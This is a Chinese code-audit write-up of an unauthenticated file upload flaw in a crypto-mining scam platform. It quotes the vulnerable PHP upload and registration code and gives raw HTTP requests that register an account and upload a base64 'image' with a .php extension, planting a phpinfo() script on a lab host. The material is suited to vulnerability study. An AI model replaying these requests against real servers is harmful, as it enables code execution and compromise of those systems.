【代码审计】某无提示云挖矿4链盗u系统前台文件上传漏洞

/*** Base64 图片上传*/publicfunctionimage(){try {      $data = $this->_vali(['base64.require' => '图片内容不为空！']);if (preg_match('|^data:image/(.*?);base64,|i', $data['base64'])) {        [$ext, $img] = explode('|||', preg_replace('|^data:image/(.*?);base64,|i', '$1|||', $data['base64']));        $info = Storage::instance()->set(Storage::name($img, $ext ?: 'png', 'image/'), base64_decode($img));$this->success('图片上传成功！', ['url' => $info['url']]);      } else {$this->error('解析内容失败！');      }    } catch (HttpResponseException $exception) {throw $exception;    } catch (Exception $exception) {$this->error($exception->getMessage());    }  }

protectedfunctioninitialize(){// 接收接口类型$this->type = $this->request->request('api');$this->type = $this->type ?: $this->request->header('api-name');$this->type = $this->type ?: $this->request->header('api-type');// 检查接口类型if (empty($this->type)) {$this->error("未获取到接口类型字段！");    }if (!isset(UserAdminService::TYPES[$this->type])) {$this->error("接口类型[{$this->type}]未定义！");    }// 获取用户数据$this->user = $this->getUser();$this->uuid = $this->user['id'] ?? '';if (empty($this->uuid)) {$this->error('用户登录失败！', '{-null-}', 401);    }  }/**     * 获取用户数据     * @return array     */protectedfunctiongetUser(): array{try {if (empty($this->uuid)) {        $token = input('token') ?: $this->request->header('api-token');if (empty($token)) $this->error('登录认证TOKEN不能为空！');        [$state, $info, $this->uuid] = UserTokenService::instance()->check($this->type, $token);if (empty($state)) $this->error($info, '{-null-}', 401);      }return UserAdminService::instance()->get($this->uuid, $this->type);    } catch (HttpResponseException $exception) {throw $exception;    } catch (Exception $exception) {$this->error($exception->getMessage());    }  }

/*** 用户统一注册入口* @throws thinkadminException* @throws thinkdbexceptionDbException*/publicfunctionregister(){    $data = $this->_vali(['region_province.default' => '','region_city.default'     => '','region_area.default'     => '','username.default'        => '','phone.mobile'            => '手机号码格式错误！','phone.require'           => '手机号码不能为空！',// 'verify.require'          => '验证码不能为空！','password.require'        => '登录密码不能为空！',                         ]);// if (MessageService::instance()->checkVerifyCode($data['verify'], $data['phone'])) {//     @验证码验证能完// } else {//     $this->error('验证失败！');// }    $map = ['phone' => $data['phone'], 'deleted' => 0];if ($this->app->db->name($this->table)->where($map)->count() > 0) {$this->error('手机号已注册，请使用其它手机号！');    }    $data['password'] = md5($data['password']);    $user = UserAdminService::instance()->set($map, $data, $this->type, true);empty($user) ? $this->error('手机注册失败！') : $this->success('用户注册成功！', $user);  }

POST /data/api.login/register HTTP/1.1Host: 192.168.200.128Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Length: 33phone=13000000000&password=123456

POST /data/api.auth.center/image HTTP/1.1Host: 192.168.200.128Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7api-token: 85449b8d46cd00ca5f15611aa0c6e44aapi-type: wapConnection: closeContent-Length: 65base64=data:image/php;base64,ZnVja3lvdTw/cGhwIHBocGluZm8oKTs/Pg==